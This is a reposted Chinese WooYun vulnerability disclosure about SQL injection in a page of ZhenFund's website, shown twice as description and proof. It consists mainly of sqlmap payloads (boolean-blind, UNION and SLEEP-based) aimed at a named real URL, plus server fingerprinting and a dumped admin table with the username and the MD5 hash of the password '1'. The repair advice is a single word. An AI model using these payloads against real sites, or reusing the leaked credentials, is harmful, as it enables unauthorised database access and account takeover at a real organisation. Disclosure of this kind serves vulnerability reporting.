记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

真格基金某处存在SQL注入

2015-09-04 02:55

真格基金 主站注入

http://www.zhenfund.com/Home/Index/category/id/4





code 区域
Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452



Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248

---

[13:46:07] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.10

back-end DBMS: MySQL 5.0.11

[13:46:07] [INFO] fetching current user

current user: 'root@localhost'







code 区域
Database: lfm_zgjj

Table: zgjj_admin

[1 entry]

+---------+--------------+------+---------+----------+----------------------------------+------------+

| adminId | createUserId | role | useFlag | username | password | createTime |

+---------+--------------+------+---------+----------+----------------------------------+------------+

| 1 | 1 | 4 | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |

+---------+--------------+------+---------+----------+----------------------------------+------------+





密码居然是1



QQ图片20150720134744.jpg

漏洞证明:

真格基金 主站注入

http://www.zhenfund.com/Home/Index/category/id/4





code 区域
Place: URI

Parameter: #1*

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND 1240=1240 AND (9452=9452



Type: UNION query

Title: MySQL UNION query (NULL) - 14 columns

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71796f6971,0x5a6b57744f626f4c544d,0x716f6f7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: http://www.zhenfund.com:80/Home/Index/category/id/4) AND SLEEP(5) AND (8248=8248

---

[13:46:07] [INFO] the back-end DBMS is MySQL

web server operating system: Windows

web application technology: Apache 2.4.10

back-end DBMS: MySQL 5.0.11

[13:46:07] [INFO] fetching current user

current user: 'root@localhost'







code 区域
Database: lfm_zgjj

Table: zgjj_admin

[1 entry]

+---------+--------------+------+---------+----------+----------------------------------+------------+

| adminId | createUserId | role | useFlag | username | password | createTime |

+---------+--------------+------+---------+----------+----------------------------------+------------+

| 1 | 1 | 4 | 1 | admin | c4ca4238a0b923820dcc509a6f75849b | 1427267282 |

+---------+--------------+------+---------+----------+----------------------------------+------------+





密码居然是1



QQ图片20150720134744.jpg

修复方案:

过滤

排查其他

知识来源: www.wooyun.org/bugs/wooyun-2015-0127853

阅读:75082 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“真格基金某处存在SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云